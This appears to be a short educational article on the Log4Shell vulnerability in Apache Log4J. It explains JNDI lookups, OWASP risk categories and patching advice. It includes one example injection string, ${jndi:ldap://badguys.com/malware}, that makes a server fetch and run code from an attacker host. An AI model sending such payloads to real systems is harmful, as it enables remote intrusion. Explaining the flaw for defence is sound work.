Log4Shell (CVE-2021-44228) is a critical security flaw within Apache Log4J, a widely-used Java-based logging library. This vulnerability has become infamous in cybersecurity circles after it opened the door for attackers to perform Remote Code Execution (RCE) attacks on a wide range of systems.

This vulnerability exploits the Java Naming Directory Interface (JDNI) lookup feature which is integral to Log4J. Attackers craft malicious strings that appear to be benign, but trigger unintended interaction with a malicious server allowing arbitrary code execution when processed by the target server. An example of such a string would be ${jndi:ldap://badguys.com/malware}, where badguys.com/malware represents the attacker-controlled payload. This method essentially allows an attacker to execute shell commands or scripts on a target server, hence the nickname “Log4Shell”.

The OWASP top 10 list provides a framework for understanding the most common security risks to web applications, and some pertinent risks are present in this vulnerability. The ability for an attacker to send untrusted data which then executed by a target server is an example of Injection (A03:2021). Any service using a vulnerable version of Log4J is an example of utilizing Vulnerable and Outdate Components (A06:2021). These risks should be well understood by all developers and organizations relying on the Java ecosystem.

If you’re running a vulnerable version of Apache Log4J (any version older than 2.15.0), you should update immediately. If you’re unable to patch, you should disable JNDI lookups as soon as possible.